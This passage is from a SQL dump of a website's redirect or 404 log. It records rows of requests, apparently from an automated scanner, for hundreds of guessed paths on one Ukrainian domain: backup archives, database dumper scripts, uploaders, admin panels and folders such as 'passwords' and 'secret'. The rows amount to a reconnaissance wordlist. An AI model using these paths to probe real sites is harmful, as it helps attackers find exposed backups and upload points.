00:00:00',301),(21223,'https://ekvatorprint.com.ua/full_backups/',NULL,'','',1,0,'2022-03-23 11:16:38','0000-00-00 00:00:00',301),(21224,'https://ekvatorprint.com.ua/full_site/',NULL,'','',1,0,'2022-03-23 11:16:38','0000-00-00 00:00:00',301),(21225,'https://ekvatorprint.com.ua/tester/',NULL,'','',1,0,'2022-03-23 11:16:39','0000-00-00 00:00:00',301),(21226,'https://ekvatorprint.com.ua/uploader/',NULL,'','',2,0,'2022-03-23 11:16:40','0000-00-00 00:00:00',301),(21227,'https://ekvatorprint.com.ua/dump/',NULL,'','',1,0,'2022-03-23 11:16:40','0000-00-00 00:00:00',301),(21228,'https://ekvatorprint.com.ua/dumps/',NULL,'','',1,0,'2022-03-23 11:16:40','0000-00-00 00:00:00',301),(21229,'https://ekvatorprint.com.ua/dumper/',NULL,'','',1,0,'2022-03-23 11:16:40','0000-00-00 00:00:00',301),(21230,'https://ekvatorprint.com.ua/_dump/',NULL,'','',1,0,'2022-03-23 11:16:41','0000-00-00 00:00:00',301),(21231,'https://ekvatorprint.com.ua/_dumps/',NULL,'','',1,0,'2022-03-23 11:16:41','0000-00-00 00:00:00',301),(21232,'https://ekvatorprint.com.ua/dmp/',NULL,'','',1,0,'2022-03-23 11:16:41','0000-00-00 00:00:00',301),(21233,'https://ekvatorprint.com.ua/download/',NULL,'','',1,0,'2022-03-23 11:16:42','0000-00-00 00:00:00',301),(21234,'https://ekvatorprint.com.ua/secret/',NULL,'','',1,0,'2022-03-23 11:16:42','0000-00-00 00:00:00',301),(21235,'https://ekvatorprint.com.ua/passwords/',NULL,'','',1,0,'2022-03-23 11:16:43','0000-00-00 00:00:00',301),(21236,'https://ekvatorprint.com.ua/logins/',NULL,'','',1,0,'2022-03-23 11:16:43','0000-00-00 00:00:00',301),(21237,'https://ekvatorprint.com.ua/admins/',NULL,'','',1,0,'2022-03-23 11:16:43','0000-00-00 00:00:00',301),(21238,'https://ekvatorprint.com.ua/administrators/',NULL,'','',1,0,'2022-03-23 11:16:43','0000-00-00 00:00:00',301),(21239,'https://ekvatorprint.com.ua/delete/',NULL,'','',1,0,'2022-03-23 11:16:44','0000-00-00 00:00:00',301),(21240,'https://ekvatorprint.com.ua/remove/',NULL,'','',1,0,'2022-03-23 11:16:44','0000-00-00 00:00:00',301),(21241,'https://ekvatorprint.com.ua/big.php',NULL,'','',1,0,'2022-03-23 11:16:45','0000-00-00 00:00:00',301),(21242,'https://ekvatorprint.com.ua/dump.php',NULL,'','',1,0,'2022-03-23 11:16:45','0000-00-00 00:00:00',301),(21243,'https://ekvatorprint.com.ua/bb.php',NULL,'','',4,0,'2022-03-23 11:16:45','0000-00-00 00:00:00',301),(21244,'https://ekvatorprint.com.ua/dmp.php',NULL,'','',1,0,'2022-03-23 11:16:46','0000-00-00 00:00:00',301),(21245,'https://ekvatorprint.com.ua/damp.php',NULL,'','',1,0,'2022-03-23 11:16:46','0000-00-00 00:00:00',301),(21246,'https://ekvatorprint.com.ua/bi.php',NULL,'','',1,0,'2022-03-23 11:16:46','0000-00-00 00:00:00',301),(21247,'https://ekvatorprint.com.ua/bigdump1.php',NULL,'','',1,0,'2022-03-23 11:16:46','0000-00-00 00:00:00',301),(21248,'https://ekvatorprint.com.ua/bd.php',NULL,'','',1,0,'2022-03-23 11:16:47','0000-00-00 00:00:00',301),(21249,'https://ekvatorprint.com.ua/db1.php',NULL,'','',1,0,'2022-03-23 11:16:47','0000-00-00 00:00:00',301),(21250,'https://ekvatorprint.com.ua/bdump.php',NULL,'','',1,0,'2022-03-23 11:16:48','0000-00-00 00:00:00',301),(21251,'https://ekvatorprint.com.ua/bigdump123.php',NULL,'','',1,0,'2022-03-23 11:16:48','0000-00-00 00:00:00',301),(21252,'https://ekvatorprint.com.ua/big/bigdump.php',NULL,'','',1,0,'2022-03-23 11:16:49','0000-00-00 00:00:00',301),(21253,'https://ekvatorprint.com.ua/db/bigdump.php',NULL,'','',1,0,'2022-03-23 11:16:49','0000-00-00 00:00:00',301),(21254,'https://ekvatorprint.com.ua/bd/bigdump.php',NULL,'','',1,0,'2022-03-23 11:16:49','0000-00-00 00:00:00',301),(21255,'https://ekvatorprint.com.ua/dumps/bigdump.php',NULL,'','',1,0,'2022-03-23 11:16:49','0000-00-00 00:00:00',301),(21256,'https://ekvatorprint.com.ua/backups/bigdump.php',NULL,'','',1,0,'2022-03-23 11:16:50','0000-00-00 00:00:00',301),(21257,'https://ekvatorprint.com.ua/u.php',NULL,'','',7,0,'2022-03-23 11:16:51','0000-00-00 00:00:00',301),(21258,'https://ekvatorprint.com.ua/uploader.php',NULL,'','',7,0,'2022-03-23 11:16:51','0000-00-00 00:00:00',301),(21259,'https://ekvatorprint.com.ua/fileupload.php',NULL,'','',1,0,'2022-03-23 11:16:52','0000-00-00 00:00:00',301),(21260,'https://ekvatorprint.com.ua/filemanager.php',NULL,'','',1,0,'2022-03-23 11:16:52','0000-00-00 00:00:00',301),(21261,'https://ekvatorprint.com.ua/manage.php',NULL,'','',1,0,'2022-03-23 11:16:52','0000-00-00 00:00:00',301),(21262,'https://ekvatorprint.com.ua/mysqldumper/index.php',NULL,'','',1,0,'2022-03-23 11:16:53','0000-00-00 00:00:00',301),(21263,'https://ekvatorprint.com.ua/msdumper/index.php',NULL,'','',1,0,'2022-03-23 11:16:54','0000-00-00 00:00:00',301),(21264,'https://ekvatorprint.com.ua/dump/index.php',NULL,'','',1,0,'2022-03-23 11:16:54','0000-00-00 00:00:00',301),(21265,'https://ekvatorprint.com.ua/dumper/index.php',NULL,'','',1,0,'2022-03-23 11:16:54','0000-00-00 00:00:00',301),(21266,'https://ekvatorprint.com.ua/msd/index.php',NULL,'','',1,0,'2022-03-23 11:16:54','0000-00-00 00:00:00',301),(21267,'https://ekvatorprint.com.ua/mysql/index.php',NULL,'','',1,0,'2022-03-23 11:16:55','0000-00-00 00:00:00',301),(21268,'https://ekvatorprint.com.ua/sqldump/index.php',NULL,'','',1,0,'2022-03-23 11:16:55','0000-00-00 00:00:00',301),(21269,'https://ekvatorprint.com.ua/sql/index.php',NULL,'','',1,0,'2022-03-23 11:16:55','0000-00-00 00:00:00',301),(21270,'https://ekvatorprint.com.ua/sd/index.php',NULL,'','',1,0,'2022-03-23 11:16:55','0000-00-00 00:00:00',301),(21271,'https://ekvatorprint.com.ua/database/index.php',NULL,'','',1,0,'2022-03-23 11:16:56','0000-00-00 00:00:00',301),(21272,'https://ekvatorprint.com.ua/db/index.php',NULL,'','',2,0,'2022-03-23 11:16:56','0000-00-00 00:00:00',301),(21273,'https://ekvatorprint.com.ua/bd/index.php',NULL,'','',1,0,'2022-03-23 11:16:56','0000-00-00 00:00:00',301),(21274,'https://ekvatorprint.com.ua/msd1.24.4/index.php',NULL,'','',1,0,'2022-03-23 11:16:56','0000-00-00 00:00:00',301),(21275,'https://ekvatorprint.com.ua/pmi.php',NULL,'','',1,0,'2022-03-23 11:16:57','0000-00-00 00:00:00',301),(21276,'https://ekvatorprint.com.ua/pmadmin.php',NULL,'','',1,0,'2022-03-23 11:16:58','0000-00-00 00:00:00',301),(21277,'https://ekvatorprint.com.ua/sqladmin.php',NULL,'','',1,0,'2022-03-23 11:16:58','0000-00-00 00:00:00',301),(21278,'https://ekvatorprint.com.ua/miniadmin.php',NULL,'','',1,0,'2022-03-23 11:16:59','0000-00-00 00:00:00',301),(21279,'https://ekvatorprint.com.ua/pm.php',NULL,'','',1,0,'2022-03-23 11:16:59','0000-00-00 00:00:00',301),(21280,'https://ekvatorprint.com.ua/minisqladmin.php',NULL,'','',1,0,'2022-03-23 11:17:00','0000-00-00 00:00:00',301),(21281,'https://ekvatorprint.com.ua/sp/index.php',NULL,'','',1,0,'2022-03-23 11:17:00','0000-00-00 00:00:00',301),(21282,'https://ekvatorprint.com.ua/search/index.php',NULL,'','',1,0,'2022-03-23 11:17:00','0000-00-00 00:00:00',301),(21283,'https://ekvatorprint.com.ua/search_replace/index.php',NULL,'','',1,0,'2022-03-23 11:17:01','0000-00-00 00:00:00',301),(21284,'https://ekvatorprint.com.ua/sr/index.php',NULL,'','',1,0,'2022-03-23 11:17:01','0000-00-00 00:00:00',301),(21285,'https://ekvatorprint.com.ua/replace/index.php',NULL,'','',1,0,'2022-03-23 11:17:01','0000-00-00 00:00:00',301),(21286,'https://ekvatorprint.com.ua/dbreplace/index.php',NULL,'','',1,0,'2022-03-23 11:17:01','0000-00-00 00:00:00',301),(21287,'https://ekvatorprint.com.ua/dbsearch/index.php',NULL,'','',1,0,'2022-03-23 11:17:02','0000-00-00 00:00:00',301),(21288,'https://ekvatorprint.com.ua/sqlsearch/index.php',NULL,'','',1,0,'2022-03-23 11:17:02','0000-00-00 00:00:00',301),(21289,'https://ekvatorprint.com.ua/backup.bz2',NULL,'','',3,0,'2022-03-23 11:17:03','0000-00-00 00:00:00',301),(21290,'https://ekvatorprint.com.ua/backup.rar',NULL,'','',4,0,'2022-03-23 11:17:04','0000-00-00 00:00:00',301),(21291,'https://ekvatorprint.com.ua/backup.bak',NULL,'','',1,0,'2022-03-23 11:17:04','0000-00-00 00:00:00',301),(21292,'https://ekvatorprint.com.ua/backup.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:17:05','0000-00-00 00:00:00',301),(21293,'https://ekvatorprint.com.ua/backup.7z',NULL,'','',6,0,'2022-03-23 11:17:06','0000-00-00 00:00:00',301),(21294,'https://ekvatorprint.com.ua/backups.tar.gz',NULL,'','',1,0,'2022-03-23 11:17:07','0000-00-00 00:00:00',301),(21295,'https://ekvatorprint.com.ua/backups.bz2',NULL,'','',1,0,'2022-03-23 11:17:07','0000-00-00 00:00:00',301),(21296,'https://ekvatorprint.com.ua/backups.rar',NULL,'','',2,0,'2022-03-23 11:17:07','0000-00-00 00:00:00',301),(21297,'https://ekvatorprint.com.ua/backups.bak',NULL,'','',1,0,'2022-03-23 11:17:07','0000-00-00 00:00:00',301),(21298,'https://ekvatorprint.com.ua/backups.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:17:08','0000-00-00 00:00:00',301),(21299,'https://ekvatorprint.com.ua/backups.7z',NULL,'','',1,0,'2022-03-23 11:17:09','0000-00-00 00:00:00',301),(21300,'https://ekvatorprint.com.ua/var.sql',NULL,'','',1,0,'2022-03-23 11:17:10','0000-00-00 00:00:00',301),(21301,'https://ekvatorprint.com.ua/var.bz2',NULL,'','',1,0,'2022-03-23 11:17:10','0000-00-00 00:00:00',301),(21302,'https://ekvatorprint.com.ua/var.rar',NULL,'','',2,0,'2022-03-23 11:17:11','0000-00-00 00:00:00',301),(21303,'https://ekvatorprint.com.ua/var.bak',NULL,'','',1,0,'2022-03-23 11:17:11','0000-00-00 00:00:00',301),(21304,'https://ekvatorprint.com.ua/var.sql.gz',NULL,'','',1,0,'2022-03-23 11:17:11','0000-00-00 00:00:00',301),(21305,'https://ekvatorprint.com.ua/var.sql.zip',NULL,'','',1,0,'2022-03-23 11:17:12','0000-00-00 00:00:00',301),(21306,'https://ekvatorprint.com.ua/var.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:17:12','0000-00-00 00:00:00',301),(21307,'https://ekvatorprint.com.ua/var.sql.tar',NULL,'','',1,0,'2022-03-23 11:17:12','0000-00-00 00:00:00',301),(21308,'https://ekvatorprint.com.ua/var.7z',NULL,'','',1,0,'2022-03-23 11:17:13','0000-00-00 00:00:00',301),(21309,'https://ekvatorprint.com.ua/var.gz',NULL,'','',1,0,'2022-03-23 11:17:13','0000-00-00 00:00:00',301),(21310,'https://ekvatorprint.com.ua/www.bz2',NULL,'','',1,0,'2022-03-23 11:17:14','0000-00-00 00:00:00',301),(21311,'https://ekvatorprint.com.ua/www.rar',NULL,'','',4,0,'2022-03-23 11:17:14','0000-00-00 00:00:00',301),(21312,'https://ekvatorprint.com.ua/www.bak',NULL,'','',1,0,'2022-03-23 11:17:14','0000-00-00 00:00:00',301),(21313,'https://ekvatorprint.com.ua/www.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:17:15','0000-00-00 00:00:00',301),(21314,'https://ekvatorprint.com.ua/www.7z',NULL,'','',1,0,'2022-03-23 11:17:16','0000-00-00 00:00:00',301),(21315,'https://ekvatorprint.com.ua/app.sql',NULL,'','',1,0,'2022-03-23 11:17:17','0000-00-00 00:00:00',301),(21316,'https://ekvatorprint.com.ua/app.bz2',NULL,'','',1,0,'2022-03-23 11:17:18','0000-00-00 00:00:00',301),(21317,'https://ekvatorprint.com.ua/app.rar',NULL,'','',2,0,'2022-03-23 11:17:18','0000-00-00 00:00:00',301),(21318,'https://ekvatorprint.com.ua/app.bak',NULL,'','',1,0,'2022-03-23 11:17:18','0000-00-00 00:00:00',301),(21319,'https://ekvatorprint.com.ua/app.sql.gz',NULL,'','',1,0,'2022-03-23 11:17:19','0000-00-00 00:00:00',301),(21320,'https://ekvatorprint.com.ua/app.sql.zip',NULL,'','',1,0,'2022-03-23 11:17:19','0000-00-00 00:00:00',301),(21321,'https://ekvatorprint.com.ua/app.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:17:19','0000-00-00 00:00:00',301),(21322,'https://ekvatorprint.com.ua/app.sql.tar',NULL,'','',1,0,'2022-03-23 11:17:19','0000-00-00 00:00:00',301),(21323,'https://ekvatorprint.com.ua/app.7z',NULL,'','',1,0,'2022-03-23 11:17:20','0000-00-00 00:00:00',301),(21324,'https://ekvatorprint.com.ua/app.gz',NULL,'','',1,0,'2022-03-23 11:17:20','0000-00-00 00:00:00',301),(21325,'https://ekvatorprint.com.ua/htdocs.sql',NULL,'','',1,0,'2022-03-23 11:17:20','0000-00-00 00:00:00',301),(21326,'https://ekvatorprint.com.ua/htdocs.bz2',NULL,'','',1,0,'2022-03-23 11:17:21','0000-00-00 00:00:00',301),(21327,'https://ekvatorprint.com.ua/htdocs.rar',NULL,'','',2,0,'2022-03-23 11:17:21','0000-00-00 00:00:00',301),(21328,'https://ekvatorprint.com.ua/htdocs.bak',NULL,'','',1,0,'2022-03-23 11:17:22','0000-00-00 00:00:00',301),(21329,'https://ekvatorprint.com.ua/htdocs.sql.gz',NULL,'','',1,0,'2022-03-23 11:17:22','0000-00-00 00:00:00',301),(21330,'https://ekvatorprint.com.ua/htdocs.sql.zip',NULL,'','',1,0,'2022-03-23 11:17:22','0000-00-00 00:00:00',301),(21331,'https://ekvatorprint.com.ua/htdocs.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:17:23','0000-00-00 00:00:00',301),(21332,'https://ekvatorprint.com.ua/htdocs.sql.tar',NULL,'','',1,0,'2022-03-23 11:17:23','0000-00-00 00:00:00',301),(21333,'https://ekvatorprint.com.ua/htdocs.7z',NULL,'','',1,0,'2022-03-23 11:17:24','0000-00-00 00:00:00',301),(21334,'https://ekvatorprint.com.ua/htdocs.gz',NULL,'','',1,0,'2022-03-23 11:17:24','0000-00-00 00:00:00',301),(21335,'https://ekvatorprint.com.ua/home.sql',NULL,'','',1,0,'2022-03-23 11:17:24','0000-00-00 00:00:00',301),(21336,'https://ekvatorprint.com.ua/home.bz2',NULL,'','',1,0,'2022-03-23 11:17:25','0000-00-00 00:00:00',301),(21337,'https://ekvatorprint.com.ua/home.rar',NULL,'','',5,0,'2022-03-23 11:17:25','0000-00-00 00:00:00',301),(21338,'https://ekvatorprint.com.ua/home.bak',NULL,'','',1,0,'2022-03-23 11:17:26','0000-00-00 00:00:00',301),(21339,'https://ekvatorprint.com.ua/home.sql.gz',NULL,'','',1,0,'2022-03-23 11:17:26','0000-00-00 00:00:00',301),(21340,'https://ekvatorprint.com.ua/home.sql.zip',NULL,'','',1,0,'2022-03-23 11:17:27','0000-00-00 00:00:00',301),(21341,'https://ekvatorprint.com.ua/home.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:17:27','0000-00-00 00:00:00',301),(21342,'https://ekvatorprint.com.ua/home.sql.tar',NULL,'','',1,0,'2022-03-23 11:17:27','0000-00-00 00:00:00',301),(21343,'https://ekvatorprint.com.ua/home.7z',NULL,'','',1,0,'2022-03-23 11:17:28','0000-00-00 00:00:00',301),(21344,'https://ekvatorprint.com.ua/home.gz',NULL,'','',1,0,'2022-03-23 11:17:28','0000-00-00 00:00:00',301),(21345,'https://ekvatorprint.com.ua/full_backup.sql',NULL,'','',1,0,'2022-03-23 11:17:28','0000-00-00 00:00:00',301),(21346,'https://ekvatorprint.com.ua/full_backup.tar',NULL,'','',1,0,'2022-03-23 11:17:28','0000-00-00 00:00:00',301),(21347,'https://ekvatorprint.com.ua/full_backup.tar.gz',NULL,'','',1,0,'2022-03-23 11:17:29','0000-00-00 00:00:00',301),(21348,'https://ekvatorprint.com.ua/full_backup.bz2',NULL,'','',1,0,'2022-03-23 11:17:29','0000-00-00 00:00:00',301),(21349,'https://ekvatorprint.com.ua/full_backup.rar',NULL,'','',2,0,'2022-03-23 11:17:29','0000-00-00 00:00:00',301),(21350,'https://ekvatorprint.com.ua/full_backup.bak',NULL,'','',1,0,'2022-03-23 11:17:29','0000-00-00 00:00:00',301),(21351,'https://ekvatorprint.com.ua/full_backup.zip',NULL,'','',1,0,'2022-03-23 11:17:30','0000-00-00 00:00:00',301),(21352,'https://ekvatorprint.com.ua/full_backup.sql.gz',NULL,'','',1,0,'2022-03-23 11:17:30','0000-00-00 00:00:00',301),(21353,'https://ekvatorprint.com.ua/full_backup.sql.zip',NULL,'','',1,0,'2022-03-23 11:17:30','0000-00-00 00:00:00',301),(21354,'https://ekvatorprint.com.ua/full_backup.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:17:30','0000-00-00 00:00:00',301),(21355,'https://ekvatorprint.com.ua/full_backup.sql.tar',NULL,'','',1,0,'2022-03-23 11:17:31','0000-00-00 00:00:00',301),(21356,'https://ekvatorprint.com.ua/full_backup.7z',NULL,'','',1,0,'2022-03-23 11:17:31','0000-00-00 00:00:00',301),(21357,'https://ekvatorprint.com.ua/full_backup.gz',NULL,'','',1,0,'2022-03-23 11:17:31','0000-00-00 00:00:00',301),(21358,'https://ekvatorprint.com.ua/full_site.sql',NULL,'','',1,0,'2022-03-23 11:17:32','0000-00-00 00:00:00',301),(21359,'https://ekvatorprint.com.ua/full_site.tar',NULL,'','',1,0,'2022-03-23 11:17:32','0000-00-00 00:00:00',301),(21360,'https://ekvatorprint.com.ua/full_site.tar.gz',NULL,'','',1,0,'2022-03-23 11:17:32','0000-00-00 00:00:00',301),(21361,'https://ekvatorprint.com.ua/full_site.bz2',NULL,'','',1,0,'2022-03-23 11:17:32','0000-00-00 00:00:00',301),(21362,'https://ekvatorprint.com.ua/full_site.rar',NULL,'','',2,0,'2022-03-23 11:17:33','0000-00-00 00:00:00',301),(21363,'https://ekvatorprint.com.ua/full_site.bak',NULL,'','',1,0,'2022-03-23 11:17:33','0000-00-00 00:00:00',301),(21364,'https://ekvatorprint.com.ua/full_site.zip',NULL,'','',1,0,'2022-03-23 11:17:33','0000-00-00 00:00:00',301),(21365,'https://ekvatorprint.com.ua/full_site.sql.gz',NULL,'','',1,0,'2022-03-23 11:17:33','0000-00-00 00:00:00',301),(21366,'https://ekvatorprint.com.ua/full_site.sql.zip',NULL,'','',1,0,'2022-03-23 11:17:34','0000-00-00 00:00:00',301),(21367,'https://ekvatorprint.com.ua/full_site.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:17:34','0000-00-00 00:00:00',301),(21368,'https://ekvatorprint.com.ua/full_site.sql.tar',NULL,'','',1,0,'2022-03-23 11:17:34','0000-00-00 00:00:00',301),(21369,'https://ekvatorprint.com.ua/full_site.7z',NULL,'','',1,0,'2022-03-23 11:17:35','0000-00-00 00:00:00',301),(21370,'https://ekvatorprint.com.ua/full_site.gz',NULL,'','',1,0,'2022-03-23 11:17:35','0000-00-00 00:00:00',301),(21371,'https://ekvatorprint.com.ua/site.sql',NULL,'','',1,0,'2022-03-23 11:17:35','0000-00-00 00:00:00',301),(21372,'https://ekvatorprint.com.ua/site.tar',NULL,'','',3,0,'2022-03-23 11:17:35','0000-00-00 00:00:00',301),(21373,'https://ekvatorprint.com.ua/site.bz2',NULL,'','',1,0,'2022-03-23 11:17:36','0000-00-00 00:00:00',301),(21374,'https://ekvatorprint.com.ua/site.rar',NULL,'','',4,0,'2022-03-23 11:17:36','0000-00-00 00:00:00',301),(21375,'https://ekvatorprint.com.ua/site.bak',NULL,'','',1,0,'2022-03-23 11:17:36','0000-00-00 00:00:00',301),(21376,'https://ekvatorprint.com.ua/site.sql.gz',NULL,'','',1,0,'2022-03-23 11:17:37','0000-00-00 00:00:00',301),(21377,'https://ekvatorprint.com.ua/site.sql.zip',NULL,'','',1,0,'2022-03-23 11:17:37','0000-00-00 00:00:00',301),(21378,'https://ekvatorprint.com.ua/site.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:17:37','0000-00-00 00:00:00',301),(21379,'https://ekvatorprint.com.ua/site.sql.tar',NULL,'','',1,0,'2022-03-23 11:17:37','0000-00-00 00:00:00',301),(21380,'https://ekvatorprint.com.ua/site.7z',NULL,'','',1,0,'2022-03-23 11:17:38','0000-00-00 00:00:00',301),(21381,'https://ekvatorprint.com.ua/site.gz',NULL,'','',1,0,'2022-03-23 11:17:38','0000-00-00 00:00:00',301),(21382,'https://ekvatorprint.com.ua/123.sql',NULL,'','',1,0,'2022-03-23 11:17:47','0000-00-00 00:00:00',301),(21383,'https://ekvatorprint.com.ua/123.tar',NULL,'','',1,0,'2022-03-23 11:17:47','0000-00-00 00:00:00',301),(21384,'https://ekvatorprint.com.ua/123.tar.gz',NULL,'','',1,0,'2022-03-23 11:17:47','0000-00-00 00:00:00',301),(21385,'https://ekvatorprint.com.ua/123.bz2',NULL,'','',1,0,'2022-03-23 11:17:48','0000-00-00 00:00:00',301),(21386,'https://ekvatorprint.com.ua/123.rar',NULL,'','',2,0,'2022-03-23 11:17:48','0000-00-00 00:00:00',301),(21387,'https://ekvatorprint.com.ua/123.bak',NULL,'','',1,0,'2022-03-23 11:17:48','0000-00-00 00:00:00',301),(21388,'https://ekvatorprint.com.ua/123.zip',NULL,'','',1,0,'2022-03-23 11:17:49','0000-00-00 00:00:00',301),(21389,'https://ekvatorprint.com.ua/123.sql.gz',NULL,'','',1,0,'2022-03-23 11:17:49','0000-00-00 00:00:00',301),(21390,'https://ekvatorprint.com.ua/123.sql.zip',NULL,'','',1,0,'2022-03-23 11:17:49','0000-00-00 00:00:00',301),(21391,'https://ekvatorprint.com.ua/123.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:17:49','0000-00-00 00:00:00',301),(21392,'https://ekvatorprint.com.ua/123.sql.tar',NULL,'','',1,0,'2022-03-23 11:17:50','0000-00-00 00:00:00',301),(21393,'https://ekvatorprint.com.ua/123.7z',NULL,'','',1,0,'2022-03-23 11:17:50','0000-00-00 00:00:00',301),(21394,'https://ekvatorprint.com.ua/123.gz',NULL,'','',1,0,'2022-03-23 11:17:51','0000-00-00 00:00:00',301),(21395,'https://ekvatorprint.com.ua/bak.sql',NULL,'','',2,0,'2022-03-23 11:17:51','0000-00-00 00:00:00',301),(21396,'https://ekvatorprint.com.ua/bak.tar',NULL,'','',1,0,'2022-03-23 11:17:51','0000-00-00 00:00:00',301),(21397,'https://ekvatorprint.com.ua/bak.tar.gz',NULL,'','',1,0,'2022-03-23 11:17:51','0000-00-00 00:00:00',301),(21398,'https://ekvatorprint.com.ua/bak.bz2',NULL,'','',1,0,'2022-03-23 11:17:52','0000-00-00 00:00:00',301),(21399,'https://ekvatorprint.com.ua/bak.rar',NULL,'','',2,0,'2022-03-23 11:17:52','0000-00-00 00:00:00',301),(21400,'https://ekvatorprint.com.ua/bak.bak',NULL,'','',1,0,'2022-03-23 11:17:52','0000-00-00 00:00:00',301),(21401,'https://ekvatorprint.com.ua/bak.zip',NULL,'','',1,0,'2022-03-23 11:17:52','0000-00-00 00:00:00',301),(21402,'https://ekvatorprint.com.ua/bak.sql.gz',NULL,'','',1,0,'2022-03-23 11:17:53','0000-00-00 00:00:00',301),(21403,'https://ekvatorprint.com.ua/bak.sql.zip',NULL,'','',1,0,'2022-03-23 11:17:53','0000-00-00 00:00:00',301),(21404,'https://ekvatorprint.com.ua/bak.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:17:53','0000-00-00 00:00:00',301),(21405,'https://ekvatorprint.com.ua/bak.sql.tar',NULL,'','',1,0,'2022-03-23 11:17:53','0000-00-00 00:00:00',301),(21406,'https://ekvatorprint.com.ua/bak.7z',NULL,'','',1,0,'2022-03-23 11:17:54','0000-00-00 00:00:00',301),(21407,'https://ekvatorprint.com.ua/bak.gz',NULL,'','',1,0,'2022-03-23 11:17:54','0000-00-00 00:00:00',301),(21408,'https://ekvatorprint.com.ua/backup1.sql',NULL,'','',1,0,'2022-03-23 11:17:54','0000-00-00 00:00:00',301),(21409,'https://ekvatorprint.com.ua/backup1.tar',NULL,'','',1,0,'2022-03-23 11:17:55','0000-00-00 00:00:00',301),(21410,'https://ekvatorprint.com.ua/backup1.tar.gz',NULL,'','',1,0,'2022-03-23 11:17:55','0000-00-00 00:00:00',301),(21411,'https://ekvatorprint.com.ua/backup1.bz2',NULL,'','',1,0,'2022-03-23 11:17:55','0000-00-00 00:00:00',301),(21412,'https://ekvatorprint.com.ua/backup1.rar',NULL,'','',2,0,'2022-03-23 11:17:55','0000-00-00 00:00:00',301),(21413,'https://ekvatorprint.com.ua/backup1.bak',NULL,'','',1,0,'2022-03-23 11:17:56','0000-00-00 00:00:00',301),(21414,'https://ekvatorprint.com.ua/backup1.zip',NULL,'','',1,0,'2022-03-23 11:17:56','0000-00-00 00:00:00',301),(21415,'https://ekvatorprint.com.ua/backup1.sql.gz',NULL,'','',1,0,'2022-03-23 11:17:56','0000-00-00 00:00:00',301),(21416,'https://ekvatorprint.com.ua/backup1.sql.zip',NULL,'','',1,0,'2022-03-23 11:17:56','0000-00-00 00:00:00',301),(21417,'https://ekvatorprint.com.ua/backup1.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:17:57','0000-00-00 00:00:00',301),(21418,'https://ekvatorprint.com.ua/backup1.sql.tar',NULL,'','',1,0,'2022-03-23 11:17:57','0000-00-00 00:00:00',301),(21419,'https://ekvatorprint.com.ua/backup1.7z',NULL,'','',1,0,'2022-03-23 11:17:57','0000-00-00 00:00:00',301),(21420,'https://ekvatorprint.com.ua/backup1.gz',NULL,'','',1,0,'2022-03-23 11:17:58','0000-00-00 00:00:00',301),(21421,'https://ekvatorprint.com.ua/db_backup.tar',NULL,'','',1,0,'2022-03-23 11:17:58','0000-00-00 00:00:00',301),(21422,'https://ekvatorprint.com.ua/db_backup.tar.gz',NULL,'','',1,0,'2022-03-23 11:17:58','0000-00-00 00:00:00',301),(21423,'https://ekvatorprint.com.ua/db_backup.bz2',NULL,'','',1,0,'2022-03-23 11:17:59','0000-00-00 00:00:00',301),(21424,'https://ekvatorprint.com.ua/db_backup.rar',NULL,'','',2,0,'2022-03-23 11:17:59','0000-00-00 00:00:00',301),(21425,'https://ekvatorprint.com.ua/db_backup.bak',NULL,'','',1,0,'2022-03-23 11:17:59','0000-00-00 00:00:00',301),(21426,'https://ekvatorprint.com.ua/db_backup.zip',NULL,'','',1,0,'2022-03-23 11:17:59','0000-00-00 00:00:00',301),(21427,'https://ekvatorprint.com.ua/db_backup.sql.zip',NULL,'','',1,0,'2022-03-23 11:18:00','0000-00-00 00:00:00',301),(21428,'https://ekvatorprint.com.ua/db_backup.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:18:00','0000-00-00 00:00:00',301),(21429,'https://ekvatorprint.com.ua/db_backup.sql.tar',NULL,'','',1,0,'2022-03-23 11:18:01','0000-00-00 00:00:00',301),(21430,'https://ekvatorprint.com.ua/db_backup.7z',NULL,'','',1,0,'2022-03-23 11:18:06','0000-00-00 00:00:00',301),(21431,'https://ekvatorprint.com.ua/db_backup.gz',NULL,'','',1,0,'2022-03-23 11:18:07','0000-00-00 00:00:00',301),(21432,'https://ekvatorprint.com.ua/db-backup.sql',NULL,'','',1,0,'2022-03-23 11:18:07','0000-00-00 00:00:00',301),(21433,'https://ekvatorprint.com.ua/db-backup.tar',NULL,'','',1,0,'2022-03-23 11:18:07','0000-00-00 00:00:00',301),(21434,'https://ekvatorprint.com.ua/db-backup.tar.gz',NULL,'','',1,0,'2022-03-23 11:18:07','0000-00-00 00:00:00',301),(21435,'https://ekvatorprint.com.ua/db-backup.bz2',NULL,'','',1,0,'2022-03-23 11:18:08','0000-00-00 00:00:00',301),(21436,'https://ekvatorprint.com.ua/db-backup.rar',NULL,'','',2,0,'2022-03-23 11:18:08','0000-00-00 00:00:00',301),(21437,'https://ekvatorprint.com.ua/db-backup.bak',NULL,'','',1,0,'2022-03-23 11:18:08','0000-00-00 00:00:00',301),(21438,'https://ekvatorprint.com.ua/db-backup.zip',NULL,'','',1,0,'2022-03-23 11:18:08','0000-00-00 00:00:00',301),(21439,'https://ekvatorprint.com.ua/db-backup.sql.gz',NULL,'','',1,0,'2022-03-23 11:18:09','0000-00-00 00:00:00',301),(21440,'https://ekvatorprint.com.ua/db-backup.sql.zip',NULL,'','',1,0,'2022-03-23 11:18:09','0000-00-00 00:00:00',301),(21441,'https://ekvatorprint.com.ua/db-backup.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:18:09','0000-00-00 00:00:00',301),(21442,'https://ekvatorprint.com.ua/db-backup.sql.tar',NULL,'','',1,0,'2022-03-23 11:18:09','0000-00-00 00:00:00',301),(21443,'https://ekvatorprint.com.ua/db-backup.7z',NULL,'','',1,0,'2022-03-23 11:18:10','0000-00-00 00:00:00',301),(21444,'https://ekvatorprint.com.ua/db-backup.gz',NULL,'','',1,0,'2022-03-23 11:18:10','0000-00-00 